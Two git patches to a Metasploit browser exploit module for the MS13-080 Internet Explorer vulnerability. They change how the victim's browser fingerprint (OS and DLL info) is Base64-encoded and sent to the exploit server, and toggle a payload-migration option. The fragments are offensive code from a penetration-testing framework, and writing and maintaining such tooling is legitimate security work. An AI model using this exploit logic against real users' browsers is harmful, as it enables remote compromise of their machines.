From ac78f1cc5bb8011e0501c390e7befff761fcff63 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Tue, 15 Oct 2013 23:37:11 -0500
Subject: [PATCH 1/2] Use Base64 encoding for OS parameter

I didn't even realize we already added this in server.rb. So instead
of just escaping the OS parameter, we also encode the data in base64.
I also added prependmigrate to avoid unstable conditions for the payload.
---
 .../windows/browser/ms13_080_cdisplaypointer.rb       | 11 +++++++++--
 1 file changed, 9 insertions(+), 2 deletions(-)

diff --git a/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb b/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb
index cdbd765418..3b46067eea 100644
--- a/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb
+++ b/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb
@@ -76,6 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote
         },
       'DefaultOptions'  =>
         {
+          'PrependMigrate'       => true,
           'InitialAutoRunScript' => 'migrate -f'
         },
       'Privileged'     => false,
@@ -88,6 +89,7 @@ class Metasploit3 < Msf::Exploit::Remote
   def get_check_html
     %Q|<html>
 <script>
+#{js_base64}
 #{js_os_detect}
 
 function os() {
@@ -119,7 +121,7 @@ function dll() {
 }
 
 window.onload = function() {
-  window.location = "#{get_resource}/search?o=" + escape(os()) + "&d=" + dll();
+  window.location = "#{get_resource}/search?o=" + escape(Base64.encode(os())) + "&d=" + dll();
 }
 </script>
 </html>
@@ -280,7 +282,12 @@ function kaiju() {
 
   def on_request_uri(cli, request)
     if request.uri =~ /search\?o=(.+)\&d=(.+)$/
-      target_info = { :os => Rex::Text.uri_decode($1), :dll => Rex::Text.uri_decode($2) }
+      target_info =
+      {
+        :os  => Rex::Text.decode_base64(Rex::Text.uri_decode($1)),
+        :dll => Rex::Text.uri_decode($2)
+      }
+
       sploit = get_sploit_html(target_info)
       send_response(cli, sploit, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'})
       return

From 06a212207e03d5285c617e8f1c72f88447d17292 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Wed, 16 Oct 2013 09:24:46 -0500
Subject: [PATCH 2/2] Put PrependMigrate on hold because of #1674

But I will probably still want this.
---
 modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb b/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb
index 3b46067eea..0447278a3b 100644
--- a/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb
+++ b/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb
@@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote
         },
       'DefaultOptions'  =>
         {
-          'PrependMigrate'       => true,
+          #'PrependMigrate'       => true,
           'InitialAutoRunScript' => 'migrate -f'
         },
       'Privileged'     => false,